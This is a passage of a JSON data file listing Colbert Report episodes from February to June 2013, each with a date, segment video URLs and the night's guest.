        "http://thecolbertreport.cc.com/videos/xknwhm/mr--smith-goes-to-the-state-legislature---stacey-campfield",
        "http://thecolbertreport.cc.com/videos/044mxj/-bang-with-friends--app",
        "http://thecolbertreport.cc.com/videos/eqsq39/benh-zeitlin",
        "http://thecolbertreport.cc.com/videos/xarh0o/sign-off---goodnight"
      ],
      "guest": "Behn Zeitlin"
    },
    {
      "date": "2013-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xstxbo/bush-family-email-hack",
        "http://thecolbertreport.cc.com/videos/s7p70k/pope-s-resignation---papal-speculatron-7500",
        "http://thecolbertreport.cc.com/videos/v1p2wr/pope-s-resignation---papal-speculatron-7500---james-martin",
        "http://thecolbertreport.cc.com/videos/he6l0j/garry-wills",
        "http://thecolbertreport.cc.com/videos/38op41/sign-off----why-priests--"
      ],
      "guest": "Garry Wills"
    },
    {
      "date": "2013-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hbhjqi/intro---2-12-13",
        "http://thecolbertreport.cc.com/videos/hwigu9/rnc-autopsy",
        "http://thecolbertreport.cc.com/videos/6t4bfw/conservative-victory-project",
        "http://thecolbertreport.cc.com/videos/b91wqa/arizona-s-gun-posse",
        "http://thecolbertreport.cc.com/videos/87jshg/roger-hodge",
        "http://thecolbertreport.cc.com/videos/4j42vn/sign-off---goodnight"
      ],
      "guest": "Roger Hodge"
    },
    {
      "date": "2013-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r8y2v4/obama-s-state-of-the-union",
        "http://thecolbertreport.cc.com/videos/7g4eal/state-of-the-rubio",
        "http://thecolbertreport.cc.com/videos/89tt3v/spanish-state-of-the-rubio",
        "http://thecolbertreport.cc.com/videos/wrywsk/dave-grohl",
        "http://thecolbertreport.cc.com/videos/rsui4q/sign-off---dry-mouth"
      ],
      "guest": "Dave Grohl"
    },
    {
      "date": "2013-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8k6qf1/st--valentine-s-day",
        "http://thecolbertreport.cc.com/videos/bg5se9/standard---poor-s-ratings-lawsuit",
        "http://thecolbertreport.cc.com/videos/a7o9iy/standard---poor-s-ratings-lawsuit---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/gha2xx/nailed--em---richard-eggers",
        "http://thecolbertreport.cc.com/videos/jipac1/gavin-newsom",
        "http://thecolbertreport.cc.com/videos/tl6blx/sign-off----here-s-the-deal-"
      ],
      "guest": "Gavin Newsom"
    },
    {
      "date": "2013-02-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mk66vx/russian-meteor-strike",
        "http://thecolbertreport.cc.com/videos/18bt84/colbert-platinum---huayra-sports-car--phil-mickelson---belle-isle",
        "http://thecolbertreport.cc.com/videos/nzi8fo/obama-s-secretive-golf-outing",
        "http://thecolbertreport.cc.com/videos/qsppoj/emily-bazelon",
        "http://thecolbertreport.cc.com/videos/rivg1z/sign-off---goodnight"
      ],
      "guest": "Emily Bazelon"
    },
    {
      "date": "2013-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tq706t/u-k--horse-meat-scandal",
        "http://thecolbertreport.cc.com/videos/76hws3/sport-report---international-soccer-corruption",
        "http://thecolbertreport.cc.com/videos/t95tyj/sport-report---international-soccer-corruption---alexi-lalas",
        "http://thecolbertreport.cc.com/videos/oy70q1/norway-s--national-firewood-night-",
        "http://thecolbertreport.cc.com/videos/d68kfy/david-goldhill",
        "http://thecolbertreport.cc.com/videos/4869v6/sign-off---goodnight"
      ],
      "guest": "David Goldhill"
    },
    {
      "date": "2013-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5dzdoq/-friends-of-hamas--rumor",
        "http://thecolbertreport.cc.com/videos/0x6brn/geo-group-stadium",
        "http://thecolbertreport.cc.com/videos/yhhjej/corporate-twitter-hacks",
        "http://thecolbertreport.cc.com/videos/ef8eii/lil-buck"
      ],
      "guest": "Lil Buck"
    },
    {
      "date": "2013-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dysmy8/intro---2-25-13",
        "http://thecolbertreport.cc.com/videos/n5lz93/the-word---silent-but-deadly",
        "http://thecolbertreport.cc.com/videos/ub1skg/popewatch-2013---vatican-sex-parties",
        "http://thecolbertreport.cc.com/videos/ovpx97/simon-garfield",
        "http://thecolbertreport.cc.com/videos/7ucjsc/sign-off---goodnight"
      ],
      "guest": "Simon Garfield"
    },
    {
      "date": "2013-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8vjzyf/intro---2-26-13",
        "http://thecolbertreport.cc.com/videos/gy9em4/popewatch-indeschism-2013---one-pope-over-the-line",
        "http://thecolbertreport.cc.com/videos/f5k4cb/battleground-texas---jeremy-bird",
        "http://thecolbertreport.cc.com/videos/xdriyp/drone-ducking-tips",
        "http://thecolbertreport.cc.com/videos/wr3lk3/michio-kaku",
        "http://thecolbertreport.cc.com/videos/i7sahj/sign-off---goodnight"
      ],
      "guest": "Dr. Michio Kaku"
    },
    {
      "date": "2013-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6637zm/intro---2-27-13",
        "http://thecolbertreport.cc.com/videos/8okga0/halls-mentho-lyptus-cough-drops",
        "http://thecolbertreport.cc.com/videos/9mtjmn/khalid-sheikh-mohammed-s-trial-at-gitmo",
        "http://thecolbertreport.cc.com/videos/9mvj8u/khalid-sheikh-mohammed-s-trial-at-gitmo---neal-katyal",
        "http://thecolbertreport.cc.com/videos/r7gapm/john-kerry-s-dumb-talk",
        "http://thecolbertreport.cc.com/videos/cxjhmj/paola-antonelli",
        "http://thecolbertreport.cc.com/videos/7trotu/sign-off---halls-mentho-lyptus"
      ],
      "guest": "Paola Antonelli"
    },
    {
      "date": "2013-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hmyuom/intro---2-28-13",
        "http://thecolbertreport.cc.com/videos/1epo24/colbert-report-consumer-alert---demonic-goodwill-items",
        "http://thecolbertreport.cc.com/videos/d7le3o/pope-tbd---souvenir-sales",
        "http://thecolbertreport.cc.com/videos/tnbuj0/budget-sequestration",
        "http://thecolbertreport.cc.com/videos/66dbox/jon-favreau",
        "http://thecolbertreport.cc.com/videos/o5hoan/sign-off---goodnight"
      ],
      "guest": "Obama speechwriter Jon Favreau"
    },
    {
      "date": "2013-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ouzof3/sequestration---obama-s-sci-fi-flub",
        "http://thecolbertreport.cc.com/videos/xlk2nw/the-enemy-within---dr--skylar-bayer",
        "http://thecolbertreport.cc.com/videos/4v9opj/texas-gun-training-bill---free-shotgun-experiment",
        "http://thecolbertreport.cc.com/videos/ala255/kirk-bloodsworth",
        "http://thecolbertreport.cc.com/videos/7xfdsz/sign-off---goodnight"
      ],
      "guest": "Kirk Bloodsworth"
    },
    {
      "date": "2013-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/johtnl/intro---3-5-13",
        "http://thecolbertreport.cc.com/videos/d8ua02/hugo-chavez---jon-stewart-announcements",
        "http://thecolbertreport.cc.com/videos/yesa8j/obama-s-israel-trip",
        "http://thecolbertreport.cc.com/videos/xeotb9/obama-s-israel-trip---michael-oren",
        "http://thecolbertreport.cc.com/videos/r5gahs/dennis-tito-s-mars-flyby-mission",
        "http://thecolbertreport.cc.com/videos/23396i/james-franco",
        "http://thecolbertreport.cc.com/videos/ki0n4m/sign-off---goodnight"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2013-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5pvbru/-snowquester-",
        "http://thecolbertreport.cc.com/videos/2ox5xp/voting-rights-act",
        "http://thecolbertreport.cc.com/videos/5yipjs/voting-rights-act---julian-bond",
        "http://thecolbertreport.cc.com/videos/3ddous/thought-for-food---bloomberg---the-nacho-bliss-point",
        "http://thecolbertreport.cc.com/videos/25fidf/brendan-o-connell",
        "http://thecolbertreport.cc.com/videos/76de2t/sign-off---tostitos-scoops"
      ],
      "guest": "Brendan O'Connell"
    },
    {
      "date": "2013-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7nblia/rand-paul-s-filibuster",
        "http://thecolbertreport.cc.com/videos/aq09bw/north-korea-s-armistice-breach----we-are-the-world--propaganda-video",
        "http://thecolbertreport.cc.com/videos/rz6ppl/the-bachelor",
        "http://thecolbertreport.cc.com/videos/uldxcb/john-sexton",
        "http://thecolbertreport.cc.com/videos/mhruf7/sign-off---land-of-romance"
      ],
      "guest": "John Sexton"
    },
    {
      "date": "2013-03-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6zcxhr/election-of-pope-francis",
        "http://thecolbertreport.cc.com/videos/t23n7e/history-channel-s--the-bible-",
        "http://thecolbertreport.cc.com/videos/7cya4y/colbert-super-pac---ham-rove-memorial-conference-room",
        "http://thecolbertreport.cc.com/videos/bwz16t/junot-diaz",
        "http://thecolbertreport.cc.com/videos/vwhyh8/sign-off----the-bible-"
      ],
      "guest": "Junot Diaz"
    },
    {
      "date": "2013-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ftxoqq/gop-growth---opportunity-project",
        "http://thecolbertreport.cc.com/videos/k5798h/the-word---narcicitizenship",
        "http://thecolbertreport.cc.com/videos/rj8f1x/stephen-colbert-is-watching-your-kids---whale-bone-porn",
        "http://thecolbertreport.cc.com/videos/udr4lu/eric-topol",
        "http://thecolbertreport.cc.com/videos/755nas/sign-off---medical-smartphone"
      ],
      "guest": "Dr. Eric Topol"
    },
    {
      "date": "2013-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lapsll/intro---3-27-13",
        "http://thecolbertreport.cc.com/videos/8f2crl/bill-o-reilly-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/jk0icd/facebook--like--button-science",
        "http://thecolbertreport.cc.com/videos/gd7ki7/sharia-mops",
        "http://thecolbertreport.cc.com/videos/0i05bg/carl-edgar-blake-ii",
        "http://thecolbertreport.cc.com/videos/8g5b2m/sign-off---hamlet"
      ],
      "guest": "Carl Edgar Blake II"
    },
    {
      "date": "2013-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mmwqg6/supreme-court-hearings-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/o26xyc/supreme-court-hearings-on-gay-marriage---emily-bazelon-pt--1",
        "http://thecolbertreport.cc.com/videos/qbupod/supreme-court-hearings-on-gay-marriage---emily-bazelon-pt--2",
        "http://thecolbertreport.cc.com/videos/sliefv/robert-lustig",
        "http://thecolbertreport.cc.com/videos/qlgxw8/sign-off---goodnight"
      ],
      "guest": "Dr. Robert Lustig"
    },
    {
      "date": "2013-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j7yyx1/intro---4-1-13",
        "http://thecolbertreport.cc.com/videos/mbhysf/easter-under-attack---pope-edition",
        "http://thecolbertreport.cc.com/videos/egcbz2/health-care-lottery",
        "http://thecolbertreport.cc.com/videos/g3wft7/utah-s-earth-day-celebration",
        "http://thecolbertreport.cc.com/videos/rmu5w0/sigourney-weaver",
        "http://thecolbertreport.cc.com/videos/lt4lab/sign-off---welcome-baby-nurick-"
      ],
      "guest": "Sigourney Weaver"
    },
    {
      "date": "2013-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dgrhqs/gay-marriage-fraud",
        "http://thecolbertreport.cc.com/videos/sq7yjh/we-are-at-war---north-korea",
        "http://thecolbertreport.cc.com/videos/0pozxj/we-are-at-war---north-korea---victor-cha",
        "http://thecolbertreport.cc.com/videos/w7owfy/florida-s-bong-bill",
        "http://thecolbertreport.cc.com/videos/7qy183/jim-mcgreevey",
        "http://thecolbertreport.cc.com/videos/1qietk/sign-off---goodnight"
      ],
      "guest": "Jim McGreevey"
    },
    {
      "date": "2013-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ci6sy/-morning-joe--vs--the-colbert-report",
        "http://thecolbertreport.cc.com/videos/54w6pz/gun-control---barn-orgies",
        "http://thecolbertreport.cc.com/videos/heku72/rnc-young-voters-survey",
        "http://thecolbertreport.cc.com/videos/tnl1m7/a-c--grayling",
        "http://thecolbertreport.cc.com/videos/kfs88u/sign-off---campaign-poster"
      ],
      "guest": "A.C. Grayling"
    },
    {
      "date": "2013-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6sjovw/intro---4-4-13",
        "http://thecolbertreport.cc.com/videos/2h8ym1/pegasus-pipeline-spill",
        "http://thecolbertreport.cc.com/videos/0tmqs0/koko---jeremy-irons-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/97bihb/obama-s-brain-initiative",
        "http://thecolbertreport.cc.com/videos/wb31l0/francis-collins",
        "http://thecolbertreport.cc.com/videos/jpb3iv/sign-off---eeg-cap"
      ],
      "guest": "Dr. Francis Collins"
    },
    {
      "date": "2013-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2htlq3/colbert-galactic-initiative",
        "http://thecolbertreport.cc.com/videos/z4m9xu/colbert-galactic-initiative---bill-clinton-pt--1",
        "http://thecolbertreport.cc.com/videos/y3hr34/colbert-galactic-initiative---bill-clinton-pt--2",
        "http://thecolbertreport.cc.com/videos/hmills/colbert-galactic-initiative---bill-clinton-pt--3",
        "http://thecolbertreport.cc.com/videos/jmsckt/sign-off---colbert-galactic-initiative"
      ],
      "guest": "Bill Clinton"
    },
    {
      "date": "2013-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dzx936/intro---4-9-13",
        "http://thecolbertreport.cc.com/videos/9a1zbe/prez-billy-jeff-clinton",
        "http://thecolbertreport.cc.com/videos/k04x7j/clinton-global-initiative-university-exchange-fair",
        "http://thecolbertreport.cc.com/videos/yq6m6x/exxon-s-disaster-relief",
        "http://thecolbertreport.cc.com/videos/qa420d/charlie-leduff",
        "http://thecolbertreport.cc.com/videos/jti3ea/sign-off---potato-clock"
      ],
      "guest": "Charlie LeDuff"
    },
    {
      "date": "2013-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4g4o0/navy-laser-technology",
        "http://thecolbertreport.cc.com/videos/b0yf3a/tip-wag---gun-edition---united-nations--senate-republicans---video-games",
        "http://thecolbertreport.cc.com/videos/xr32ry/anthony-weiner-s-comeback",
        "http://thecolbertreport.cc.com/videos/mvszff/shane-smith",
        "http://thecolbertreport.cc.com/videos/fhj67z/sign-off---laser-tag"
      ],
      "guest": "Shane Smith"
    },
    {
      "date": "2013-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ycrshs/nasa-lasso",
        "http://thecolbertreport.cc.com/videos/2ixasd/america-s-pot-astrophe",
        "http://thecolbertreport.cc.com/videos/t10bgi/america-s-pot-astrophe---nick-gillespie",
        "http://thecolbertreport.cc.com/videos/82a7wi/times-square-mascots-ban",
        "http://thecolbertreport.cc.com/videos/oiajpp/cass-sunstein",
        "http://thecolbertreport.cc.com/videos/5r04eq/sign-off---goodnight"
      ],
      "guest": "Cass Sunstein"
    },
    {
      "date": "2013-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ifpmy1/intro---4-16-13",
        "http://thecolbertreport.cc.com/videos/s94ied/tip-wag---brood-ii-cicadas--sexcereal---gop-internet-memes",
        "http://thecolbertreport.cc.com/videos/h77c6i/rollie-eggmaster",
        "http://thecolbertreport.cc.com/videos/c5i1jr/caroline-kennedy",
        "http://thecolbertreport.cc.com/videos/yygt35/sign-off---goodnight"
      ],
      "guest": "Caroline Kennedy"
    },
    {
      "date": "2013-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yfwqpo/ricin-letters---boston-bombing-suspects",
        "http://thecolbertreport.cc.com/videos/b1ekda/bitcoin-plunge",
        "http://thecolbertreport.cc.com/videos/rxy9ze/bitcoin-plunge---adam-davidson",
        "http://thecolbertreport.cc.com/videos/2sml1x/-accidental-racist--song",
        "http://thecolbertreport.cc.com/videos/n7jblw/alan-cumming",
        "http://thecolbertreport.cc.com/videos/4y7jmv/sign-off---goodnight"
      ],
      "guest": "Alan Cumming"
    },
    {
      "date": "2013-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jr70gq/boston-marathon--bag-men-",
        "http://thecolbertreport.cc.com/videos/de4kxw/the-bucket-maiden-voyage",
        "http://thecolbertreport.cc.com/videos/x7fhfp/gun-control-block",
        "http://thecolbertreport.cc.com/videos/tvksjy/richard-engel",
        "http://thecolbertreport.cc.com/videos/17gkl6/sign-off---the-bucket"
      ],
      "guest": "Richard Engel"
    },
    {
      "date": "2013-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nc9lav/intro---4-22-13",
        "http://thecolbertreport.cc.com/videos/vlo1dt/boston-bombers",
        "http://thecolbertreport.cc.com/videos/pd1fay/toronto-terror-plot",
        "http://thecolbertreport.cc.com/videos/06tavh/tiny-triumphs---infrastructure---river-pollution",
        "http://thecolbertreport.cc.com/videos/hkxcsa/george-w--bush-presidential-library",
        "http://thecolbertreport.cc.com/videos/d8p3y1/michael-pollan",
        "http://thecolbertreport.cc.com/videos/34u7cu/sign-off---goodnight"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2013-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12jjaw/scoobygate",
        "http://thecolbertreport.cc.com/videos/dcyvro/austerity-s-spreadsheet-error",
        "http://thecolbertreport.cc.com/videos/kbgnf0/austerity-s-spreadsheet-error---thomas-herndon",
        "http://thecolbertreport.cc.com/videos/54pqtc/eric-schmidt",
        "http://thecolbertreport.cc.com/videos/uwzpai/sign-off---goodnight"
      ],
      "guest": "Eric Schmidt"
    },
    {
      "date": "2013-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kwa0vp/ap-twitter-hack",
        "http://thecolbertreport.cc.com/videos/tk4his/bill-clinton-s-twitter-lessons",
        "http://thecolbertreport.cc.com/videos/r1hl69/tiny-triumphs---nasa-s-giant-penis-doodle",
        "http://thecolbertreport.cc.com/videos/zi0nnq/danica-patrick",
        "http://thecolbertreport.cc.com/videos/zwp3mi/sign-off---goodnight"
      ],
      "guest": "Danica Patrick"
    },
    {
      "date": "2013-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/md1l1j/exclusive---better-know-a-district---pennsylvania-s-17th---matt-cartwright",
        "http://thecolbertreport.cc.com/videos/1waayt/colbert-s-book-club",
        "http://thecolbertreport.cc.com/videos/zfq57f/better-know-a-district---pennsylvania-s-17th---matt-cartwright",
        "http://thecolbertreport.cc.com/videos/ypl8dh/miranda-rights-for-boston-bomber",
        "http://thecolbertreport.cc.com/videos/9j0img/gene-robinson",
        "http://thecolbertreport.cc.com/videos/vqrjkz/sign-off---welcome-baby-matheson-"
      ],
      "guest": "Bishop Gene Robinson"
    },
    {
      "date": "2013-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lceacn/intro---4-29-13",
        "http://thecolbertreport.cc.com/videos/s55dpi/stephen-s-worst-sports-nightmare",
        "http://thecolbertreport.cc.com/videos/q8gaki/the-final-days-of-straight-america",
        "http://thecolbertreport.cc.com/videos/su6rj1/the-word---we-shall-undermine",
        "http://thecolbertreport.cc.com/videos/u2ew19/yelp-prison-reviews",
        "http://thecolbertreport.cc.com/videos/8ewxg4/iggy-pop"
      ],
      "guest": "Iggy &amp; the Stooges"
    },
    {
      "date": "2013-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ab72e/intro---4-30-13",
        "http://thecolbertreport.cc.com/videos/6brvhc/forced-tank-spending",
        "http://thecolbertreport.cc.com/videos/yxooec/the-word---medical-leave",
        "http://thecolbertreport.cc.com/videos/4iphqy/thought-for-food---spreadable-sharia---buddy-cup",
        "http://thecolbertreport.cc.com/videos/z5q514/evan-spiegel---bobby-murphy",
        "http://thecolbertreport.cc.com/videos/i4mbhv/sign-off---snapchat"
      ],
      "guest": "Evan Spiegel &amp; Bobby Murphy"
    },
    {
      "date": "2013-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/82vhzw/over-the-counter-plan-b",
        "http://thecolbertreport.cc.com/videos/7a77hc/background-check-backlash",
        "http://thecolbertreport.cc.com/videos/rf6pzs/the-word---n-r-a--vana",
        "http://thecolbertreport.cc.com/videos/cm8gvz/macklemore---ryan-lewis",
        "http://thecolbertreport.cc.com/videos/sq79ll/sign-off----the-heist-"
      ],
      "guest": "Macklemore &amp; Ryan Lewis"
    },
    {
      "date": "2013-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tqo262/intro---5-2-13",
        "http://thecolbertreport.cc.com/videos/7emy7s/boston-bomber-accomplices",
        "http://thecolbertreport.cc.com/videos/2k1660/gitmo-hunger-strike",
        "http://thecolbertreport.cc.com/videos/is0h3a/gitmo-hunger-strike---charles-swift",
        "http://thecolbertreport.cc.com/videos/nhiiwp/movies-that-are-destroying-america---summer-movie-edition----man-of-steel-----iron-man-3-",
        "http://thecolbertreport.cc.com/videos/mqwnf6/ben-kingsley",
        "http://thecolbertreport.cc.com/videos/t46my4/sign-off---montclair-film-festival"
      ],
      "guest": "Ben Kingsley"
    },
    {
      "date": "2013-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1mqcyb/intro---5-6-13",
        "http://thecolbertreport.cc.com/videos/tnugl6/colbert-s-book-club----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/rxk0vp/stephen-colbert-s-bats--t-serious---bullet-conspiracy-theory",
        "http://thecolbertreport.cc.com/videos/ltsnqq/tip-wag---catholic-diocese-of-brooklyn---stoner-dogs",
        "http://thecolbertreport.cc.com/videos/wm2xsq/robert-caro",
        "http://thecolbertreport.cc.com/videos/479h8q/sign-off---south-carolina-special-election"
      ],
      "guest": "Robert Caro"
    },
    {
      "date": "2013-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bpnvtc/breaking-news---benghazi-whistleblowers",
        "http://thecolbertreport.cc.com/videos/wwbl80/better-know-a-district---maryland-s-4th---donna-edwards",
        "http://thecolbertreport.cc.com/videos/p3cofn/promposals",
        "http://thecolbertreport.cc.com/videos/eyzxx1/douglas-rushkoff",
        "http://thecolbertreport.cc.com/videos/ampziq/sign-off---goodnight"
      ],
      "guest": "Douglas Rushkoff"
    },
    {
      "date": "2013-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mpvlti/intro---5-8-13",
        "http://thecolbertreport.cc.com/videos/fyx23e/south-carolina-election-results",
        "http://thecolbertreport.cc.com/videos/m0huaq/spiteful-partisanship",
        "http://thecolbertreport.cc.com/videos/gbxmpo/going-diaperless",
        "http://thecolbertreport.cc.com/videos/xg0uqu/richard-besser",
        "http://thecolbertreport.cc.com/videos/in85s8/sign-off---helium-voice"
      ],
      "guest": "Dr. Richard Besser"
    },
    {
      "date": "2013-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t96yfm/colbert-s-book-club----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/1i7t2j/colbert-s-book-club---learning--the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/4apw9e/colbert-s-book-club---jennifer-egan----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/tetoi9/baz-luhrmann",
        "http://thecolbertreport.cc.com/videos/uuyuly/sign-off----the-great-gatsby-"
      ],
      "guest": "Jennifer Egan, Baz Luhrmann"
    },
    {
      "date": "2013-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hdvhlq/benghazi-attacks-talking-points",
        "http://thecolbertreport.cc.com/videos/gxwgja/colbert-super-pac-shh----irs-special-scrutiny",
        "http://thecolbertreport.cc.com/videos/jgqf2m/threatdown---planet-gay--world-wide-wood---junkie-bears",
        "http://thecolbertreport.cc.com/videos/l06a4l/jessica-buchanan---erik-landemalm",
        "http://thecolbertreport.cc.com/videos/ny9pcg/sign-off---goodnight"
      ],
      "guest": "Jessica Buchanan &amp; Erik Landemalm"
    },
    {
      "date": "2013-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g6ij84/intro---5-14-13",
        "http://thecolbertreport.cc.com/videos/1nghxb/obamacare-repeal-vote",
        "http://thecolbertreport.cc.com/videos/0jjvya/heritage-foundation-s-immigration-study",
        "http://thecolbertreport.cc.com/videos/h5zenk/who-s-not-honoring-me-now----maxim",
        "http://thecolbertreport.cc.com/videos/tq7jny/dan-brown",
        "http://thecolbertreport.cc.com/videos/ftry54/sign-off---maxim-s-hot-100"
      ],
      "guest": "Dan Brown"
    },
    {
      "date": "2013-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c91oeg/bug-protein",
        "http://thecolbertreport.cc.com/videos/qxjgw6/better-know-a-district---wisconsin-s-4th---gwen-moore-pt--1",
        "http://thecolbertreport.cc.com/videos/ft1gyx/better-know-a-district---wisconsin-s-4th---gwen-moore-pt--2",
        "http://thecolbertreport.cc.com/videos/xjltw5/cyndi-lauper",
        "http://thecolbertreport.cc.com/videos/f06og4/sign-off---kinky-boots"
      ],
      "guest": "Cyndi Lauper"
    },
    {
      "date": "2013-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ru2qad/intro---5-16-13",
        "http://thecolbertreport.cc.com/videos/vshddv/asparagusgate",
        "http://thecolbertreport.cc.com/videos/x9725b/tip-wag---wind-turbines---china",
        "http://thecolbertreport.cc.com/videos/6685w4/3d-printed-guns",
        "http://thecolbertreport.cc.com/videos/7xqphc/daniel-lieberman",
        "http://thecolbertreport.cc.com/videos/yktive/sign-off---barefoot-shoes"
      ],
      "guest": "Dr. Daniel Lieberman"
    },
    {
      "date": "2013-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iqqmsb/mazda-scandal-booth---benghazi",
        "http://thecolbertreport.cc.com/videos/xwopvb/mazda-scandal-booth---the-irs",
        "http://thecolbertreport.cc.com/videos/5qyy0w/mazda-scandal-booth---the-irs---trevor-potter",
        "http://thecolbertreport.cc.com/videos/irj43w/david-sassoon",
        "http://thecolbertreport.cc.com/videos/m9mkd8/sign-off---mazda-scandal-booth"
      ],
      "guest": "David Sassoon"
    },
    {
      "date": "2013-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wp98kg/intro---5-21-13",
        "http://thecolbertreport.cc.com/videos/7fm2v2/irish-potato-famine-pathogen",
        "http://thecolbertreport.cc.com/videos/pbfcaq/cheating-death---sun-exposure---marijuana",
        "http://thecolbertreport.cc.com/videos/3jp6f3/census-bureau-harassment",
        "http://thecolbertreport.cc.com/videos/cqajs7/noah-feldman",
        "http://thecolbertreport.cc.com/videos/2jhy5w/sign-off---goodnight"
      ],
      "guest": "Noah Feldman"
    },
    {
      "date": "2013-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c02847/intro---5-22-13",
        "http://thecolbertreport.cc.com/videos/24adff/irs-tea-party-scandal",
        "http://thecolbertreport.cc.com/videos/icnp2y/tip-wag---senators-mitch-and-chong---resourceful-rich-folk",
        "http://thecolbertreport.cc.com/videos/60entl/-citizen-koch-",
        "http://thecolbertreport.cc.com/videos/15h43y/matt-berninger"
      ],
      "guest": "The National"
    },
    {
      "date": "2013-05-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2j741e/aumf-repeal",
        "http://thecolbertreport.cc.com/videos/khhujw/aumf-repeal---andrew-bacevich",
        "http://thecolbertreport.cc.com/videos/0bv6m0/redemption-for-all",
        "http://thecolbertreport.cc.com/videos/ur1l6x/c-j--chivers",
        "http://thecolbertreport.cc.com/videos/ahpe36/sign-off---goodnight"
      ],
      "guest": "C.J. Chivers"
    },
    {
      "date": "2013-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ex0o10/stephen-s-week-off",
        "http://thecolbertreport.cc.com/videos/ervy41/better-know-a-district---wisconsin-s-2nd---mark-pocan",
        "http://thecolbertreport.cc.com/videos/s86l5y/trackingpoint-rifle",
        "http://thecolbertreport.cc.com/videos/4fwbkt/john-dingell",
        "http://thecolbertreport.cc.com/videos/yrhc20/sign-off---goodnight"
      ],
      "guest": "Rep. John Dingell"
    },
    {
      "date": "2013-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fivedj/michele-bachmann-s-last-term",
        "http://thecolbertreport.cc.com/videos/x7wc5a/tip-wag---google-glass---the-lone-ranger----3d-printed-food",
        "http://thecolbertreport.cc.com/videos/u1fvmr/irs-political-targeting---line-dancing-scandals",
        "http://thecolbertreport.cc.com/videos/tz8gve/alex-gibney",
        "http://thecolbertreport.cc.com/videos/fbuavt/sign-off---goodnight"
      ],
      "guest": "Alex Gibney"
    },
    {
      "date": "2013-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ntvt9/intro---6-5-13",
        "http://thecolbertreport.cc.com/videos/eogja8/commando-of-steel",
        "http://thecolbertreport.cc.com/videos/fva65v/monsanto-s-modified-wheat",
        "http://thecolbertreport.cc.com/videos/ibdfsk/monsanto-s-modified-wheat---laurie-garrett",
        "http://thecolbertreport.cc.com/videos/bqahez/photojournalists-vs--iphones",
        "http://thecolbertreport.cc.com/videos/wqd06c/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/el0t4o/sign-off---amber-waves-of-frankengrain"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2013-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/onw7lq/nsa-phone-surveillance",
        "http://thecolbertreport.cc.com/videos/hbmw2f/colbert-classic---spy-training-with-peter-earnest",
        "http://thecolbertreport.cc.com/videos/zhz7uc/john-mellencamp--stephen-king---t-bone-burnett---pt--1",
        "http://thecolbertreport.cc.com/videos/lcf7d3/john-mellencamp--stephen-king---t-bone-burnett---pt--2",
        "http://thecolbertreport.cc.com/videos/46x6yt/sign-off---nose-tap"
      ],
      "guest": "Stephen King, John Mellencamp, T Bone Burnett"
    },
    {
      "date": "2013-06-10",
      "videos": [
